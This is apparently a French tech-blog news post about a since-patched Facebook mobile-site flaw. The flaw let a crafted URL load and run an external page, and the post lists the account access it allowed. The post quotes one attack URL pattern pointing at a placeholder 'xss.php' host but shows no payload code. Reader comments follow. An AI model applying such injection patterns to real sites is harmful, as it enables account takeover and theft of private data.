En effet, une faille de sécurité était utilisable sur la version iphone de facebook : http://touch.facebook.com/.
Cette faille de sécurité permettait d’appeler des pages externes à Facebook du genre suivant :
http://touch.facebook.com/ # http://example.com/xss.php
Le code de la page xss.php étant exécuté.
Il été ensuite facile pour un expert d’accéder aux informations voulues.
Le fichier PHP avait pour but de modifier les entêtes et donc les paramètres par défaut.
Afin de désactiver les différentes protections mises en places…
Voici un exemple :
Tous ceux qui pouvaient exploiter cette faille de sécurité on pu :
- Savoir qui vous étiez
- Voir vos photos
- Lire vos messages (reçus et envoyés)
- Envoyer des messages à votre place
- Accéder à vos données privées (email, téléphone etc.. etc..)
- Ajouter des amis
- Ecrire des commentaires à votre place
et la liste est encore bien longue.
La fameuse faille a heureusement été comblée en 1 jour.
Source (anglais) m-austin.com
A bientôt les geeks 😉
Admin
Passionné par l'univers du Web, les Nouvelles Technologies et le High-Tech, je partage sur Place4Geek mes découvertes et le meilleur de l'actualité geek, du net, des jeux, du Raspberry Pi, de la domotique et bien d'autres !
Articles Similaires
Derniers Commentaires
dans Concours noël viens tenter de gagner des produits Aukey ! [Terminé]Bonjour. J'ai acheté plusieurs produits Aukey avec satisfaction : Chargeur, câbles, chargeur de voiture, support de téléphone... Une marque que
dans Les clés de licence génériques pour l’installation de Windows et OfficeBonsoir je recherche id d'installation pour office professionnel plus 2019,merci pour votre aide
dans Le Boot : explications + TutoBonjour ,j'ai un problème au niveau du démarrage de l'ordinateur quand j'essaye il m montre go boot to os
No Comment